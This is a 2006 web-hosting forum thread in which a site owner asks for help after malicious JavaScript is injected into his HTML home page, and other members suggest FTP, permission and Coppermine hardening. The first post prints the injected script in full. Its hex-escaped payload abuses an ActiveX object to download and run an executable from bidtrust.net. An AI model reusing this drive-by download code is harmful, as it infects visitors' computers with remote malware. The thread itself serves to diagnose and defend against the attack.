Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other
Author Message
kevinkap
Involved
Involved


Joined: Apr 22, 2006
Posts: 356

PostPosted: Wed Sep 13, 2006 1:58 pm Reply with quote

I have a site that is simple html. I keep finding a file in the public_html dir. called ftp_info.php, then my home page keeps coming up with some javascript tags in it from ebayautionpros.net and from bidtrust.net. They both reference a js at the directed site. The one on the bidtrust site actually shows you the page and it is this:
Code:
function setCookie (name, value, expires, path, domain, secure) {

bad_tag = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}
function getCookie(name) {
var cookie = " " + bad_tag;
var search = " " + name + "=";
var setStr = null;
var offset = 0;
var end = 0;
if (cookie.length > 0) {
offset = cookie.indexOf(search);
if (offset != -1) {
offset += search.length;
end = cookie.indexOf(";", offset)
if (end == -1) {
end = cookie.length;
}
setStr = unescape(cookie.substring(offset, end));
}
}
return(setStr);
}
function getProperties(obj) {
var properties = ''
for(var propName in obj)
properties += propName+"="+obj[propName]+" , "
return properties
}
function which_browser(){
navigator.DOM=!!(document.getElementById?1:0)
navigator.OPERA=!!(window.opera)
navigator.OPERA5=!!(navigator.OPERA&&navigator.userAgent.indexOf("pera 5")>0)
navigator.IE7=!!(navigator.appVersion.indexOf("IE 7")>0&&navigator.DOM&&!navigator.OPERA?1:0)
navigator.IE6=!!(navigator.appVersion.indexOf("IE 6")>0&&navigator.DOM&&!navigator.OPERA?1:0)
navigator.IE5=!!(navigator.appVersion.indexOf("IE 5")>0&&navigator.DOM&&!navigator.OPERA?1:0)
navigator.IE4=!!(document.all&&!navigator.DOM?1:0)
navigator.IE=!!(navigator.IE4||navigator.IE5||navigator.IE6||navigator.IE7)
navigator.MAC=!!(navigator.userAgent.indexOf("Mac")>0)
navigator.NS6=!!(navigator.DOM && parseInt(navigator.appVersion)>4?1:0)
navigator.NS4=!!(document.layers && !navigator.DOM?1:0)
navigator.DOMCORE1=!!(typeof(document.getElementsByTagName)!='undefined' && typeof(document.createElement)!='undefined')
navigator.DOMCORE2=!!(navigator.DOMCORE1 && typeof(document.getElementById) != 'undefined' && typeof(document.createElementNS) != 'undefined')
navigator.DOMHTML=!!(navigator.DOMCORE1 && typeof(document.getElementById) != 'undefined')
navigator.DOMCSS1=!!(navigator.NS6||navigator.IE)
navigator.DOMCSS2=!!(false)
if(navigator.DOMCORE1){
var element=document.createElement('p')
navigator.DOMCSS2=(typeof(element.style)=='object')
}
navigator.detected=(navigator.IE6||navigator.IE5||navigator.IE4||
navigator.NS6||navigator.NS4||
navigator.OPERA5||navigator.OPERA||
navigator.DOM)
}
which_browser()
var agt=getProperties(navigator).toLowerCase()
var is_winme = ((agt.indexOf("win 9x 4.90")!=-1));
var is_win2k = ((agt.indexOf("windows nt 5.0")!=-1));
var is_winxp = ((agt.indexOf("windows nt 5.1")!=-1));
var is_win2k3 = ((agt.indexOf("windows nt 5.2")!=-1));
var is_cookie = ((agt.indexOf("cookieenabled=true")!=-1));
var execute_wmf = is_winxp || is_win2k3;

if (is_cookie)
{
    if (navigator.IE)
    {
        var my_cookie = getCookie("25425112357");
        if (my_cookie != "41250190239")
        {
            setCookie("25425112357", "41250190239", "Mon, 01-Dec-2007 00:00:00 GMT", "/");

var var10010210259=unescape('%3C%73%63%72%69%70%74%3E%0D%0A%76%61%72%20%6F%62%6A%5F%52%44%53%20'+
'%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65'+
'%6E%74%28%27%6F%62%6A%65%63%74%27%29%3B%0D%0A%6F%62%6A%5F%52%44%53'+
'%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%27%6F%62'+
'%6A%5F%52%44%53%27%29%3B%0D%0A%6F%62%6A%5F%52%44%53%2E%73%65%74%41'+
'%74%74%72%69%62%75%74%65%28%27%63%6C%61%73%73%69%64%27%2C%27%63%6C'+
'%73%69%64%3A%42%44%39%36%43%35%35%36%2D%36%35%41%33%2D%31%31%44%30'+
'%2D%39%38%33%41%2D%30%30%43%30%34%46%43%32%39%45%33%36%27%29%3B%0D'+
'%0A%74%72%79%0D%0A%7B%0D%0A%76%61%72%20%6F%62%6A%5F%6D%73%78%6D%6C'+
'%32%20%3D%20%6F%62%6A%5F%52%44%53%2E%43%72%65%61%74%65%4F%62%6A%65'+
'%63%74%28%22%6D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50%22%2C%22%22'+
'%29%3B%0D%0A%6F%62%6A%5F%6D%73%78%6D%6C%32%2E%6F%70%65%6E%28%22%47'+
'%45%54%22%2C%22%68%74%74%70%3A%2F%2F%62%69%64%74%72%75%73%74%2E%6E'+
'%65%74%2F%67%2F%6E%65%77%62%75%69%6C%64%73%65%72%79%79%2E%65%78%65'+
'%22%2C%66%61%6C%73%65%29%3B%0D%0A%6F%62%6A%5F%6D%73%78%6D%6C%32%2E'+
'%73%65%6E%64%28%29%3B%0D%0A%76%61%72%20%6F%62%6A%5F%53%68%65%6C%6C'+
'%41%70%70%20%3D%20%6F%62%6A%5F%52%44%53%2E%43%72%65%61%74%65%4F%62'+
'%6A%65%63%74%28%22%53%68%65%6C%6C%2E%41%70%70%6C%69%63%61%74%69%6F'+
'%6E%22%2C%22%22%29%3B%0D%0A%76%61%72%20%6F%62%6A%5F%61%64%6F%64%62'+
'%20%3D%20%6F%62%6A%5F%52%44%53%2E%43%72%65%61%74%65%4F%62%6A%65%63'+
'%74%28%22%61%64%6F%64%62%2E%73%74%72%65%61%6D%22%2C%22%22%29%3B%0D'+
'%0A%6F%62%6A%5F%61%64%6F%64%62%2E%74%79%70%65%20%3D%20%31%3B%0D%0A'+
'%6F%62%6A%5F%61%64%6F%64%62%2E%6F%70%65%6E%28%29%3B%0D%0A%6F%62%6A'+
'%5F%61%64%6F%64%62%2E%57%72%69%74%65%28%6F%62%6A%5F%6D%73%78%6D%6C'+
'%32%2E%72%65%73%70%6F%6E%73%65%42%6F%64%79%29%3B%0D%0A%76%61%72%20'+
'%66%6E%20%3D%20%22%43%3A%5C%5C%31%37%36%35%36%31%37%39%32%32%36%2E'+
'%65%78%65%22%3B%0D%0A%6F%62%6A%5F%61%64%6F%64%62%2E%53%61%76%65%54'+
'%6F%46%69%6C%65%28%66%6E%2C%32%29%3B%0D%0A%6F%62%6A%5F%53%68%65%6C'+
'%6C%41%70%70%2E%53%68%65%6C%6C%45%78%65%63%75%74%65%28%66%6E%29%3B'+
'%0D%0A%7D%0D%0A%63%61%74%63%68%28%65%29%7B%7D%0D%0A%3C%2F%73%63%72'+
'%69%70%74%3E%0D%0A');
document.write(var10010210259);

var var37458745 =
   unescape(
   "%3C%69%6D%67%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%69%64%74%72%75%73%74%2E%6E%65%74%2F"+
   "%74%72%61%66%66%2F%63%6F%75%6E%74%65%72%2E%70%68%70%27%20%77%69%64%74%68%3D%30%20%68%65%69"+
   "%67%68%74%3D%30%3E"
   );
document.write(var37458745);
        }
    }
}


What is this and how can I stop it? The index page is permissioned 644.

Thanks, Kevin
 
View user's profile Send private message
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Wed Sep 13, 2006 2:21 pm Reply with quote

Could be a hacker exploting your system.

You are using HTML only? There are no other scripts running on it?

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
kevinkap
PostPosted: Wed Sep 13, 2006 2:24 pm Reply with quote

I guess I mis-spoke, it does use js for navigation and no rightclick and such, there is also a coppermine gallery on a diff. part of the site. The index page is all that has been messed with. I have found this twice in the past couple weeks now. The bidtrust was found just this second time. and uses frontpage extensions
 
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Wed Sep 13, 2006 2:52 pm Reply with quote

I would start by making sure that you don't have anonymous FTP enabled. Also I'd look at any FTP accounts and make sure that I trust anyone to whom I've allocated them. I would also make sure that the passwords for all FTP accounts are changed and that they are set up as difficult to hack ... no using your pet's name or your own name ... you know that routine. If you have a web administration account I'd change the password on that and make it hard to hack (use a combination of letters, numbers, special characters and not a word that's in the dictionary). Then I'd delete that file you mention and keep looking for it's re-emergence.

You can also look thru your logs and see if there is anything suspicious there, especially if you can narrow down the time when that file got put out there.
 
View user's profile Send private message Visit poster's website
kevinkap
PostPosted: Wed Sep 13, 2006 3:53 pm Reply with quote

I have located the ip of the person doing this from the ftp logs. anonymous is disabled so how are they doing it.

This is the ftp log:

Sun Sep 03 01:09:54 2006 0 209.160.64.108 9243 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sun Sep 03 01:09:54 2006 0 209.160.64.108 9304 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sun Sep 03 01:09:54 2006 0 209.160.64.108 9304 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sun Sep 03 01:09:55 2006 0 209.160.64.108 9365 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sun Sep 03 13:01:31 2006 0 209.160.64.108 199 /home/myuser/ftp_info.php a _ i r myuser ftp 1 * c
Sun Sep 03 13:01:31 2006 0 209.160.64.108 199 /home/myuser/public_html/ftp_info.php a _ i r myuser ftp 1 * c
Sat Sep 09 01:47:28 2006 0 209.25.195.66 9365 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sat Sep 09 01:47:28 2006 0 209.25.195.66 9243 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sat Sep 09 01:47:29 2006 0 209.25.195.66 9243 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sat Sep 09 01:47:29 2006 0 209.25.195.66 9243 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sat Sep 09 05:38:09 2006 0 209.25.195.66 9243 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sat Sep 09 05:38:09 2006 0 209.25.195.66 9301 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sat Sep 09 05:38:10 2006 0 209.25.195.66 9301 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sat Sep 09 05:38:10 2006 0 209.25.195.66 9359 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sun Sep 10 00:34:40 2006 0 209.25.195.66 9359 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sun Sep 10 00:34:41 2006 0 209.25.195.66 9419 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c
Sun Sep 10 00:34:41 2006 0 209.25.195.66 9419 /home/myuser/public_html/index.htm b _ o r myuser ftp 1 * c
Sun Sep 10 00:34:42 2006 0 209.25.195.66 9479 /home/myuser/public_html/index.htm b _ i r myuser ftp 1 * c


So what do I do now?

Thanks, Kevin
 
evaders99
PostPosted: Wed Sep 13, 2006 4:03 pm Reply with quote

Coppermine could be the culprit. There maybe other backdoors in your system, you would need to work with your host to find out. I don't know if there's another exploit that would be affect the html files, perhaps they did something else like target your web server software.
 
fkelly
PostPosted: Wed Sep 13, 2006 4:59 pm Reply with quote

As Evaders said it could be Coppermine.

Do you have FTP accounts set up? If so, I'd get rid of all but your own and change the password on it. In the shared web hosting arrangement I'm familiar with (IPOWERWEB) the main admin account has control over the FTP accounts and I'm pretty sure it's the same in a CPANEL system.

I'd also add a
deny from 209.25.195.66
to my .htaccess file

Someone who knows more about servers than I can probably address whether that will be effective against the type of attack in your log.
 
kevinkap
PostPosted: Wed Sep 13, 2006 5:44 pm Reply with quote

Thanks for the replies
 
technocrat
Life Cycles Becoming CPU Cycles


Joined: Jul 07, 2005
Posts: 511

PostPosted: Thu Sep 14, 2006 9:16 am Reply with quote

If files are showing up on your system it could any number of exploits. The current popular ones are the phpbb admin XSS and the php 777 hack. Do you have the most current sentinel version? Do you have any folders in your system that are CHMOD to 777?

Are you using coppermine, spchat, or vwar?

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! / Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message
kevinkap
PostPosted: Thu Sep 14, 2006 9:26 am Reply with quote

I have coppermine. I have changed some folders that were 777 to 755 and made sure all files are 644. I am not using nuke on the site. I have now had the ip blocked via apf.
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©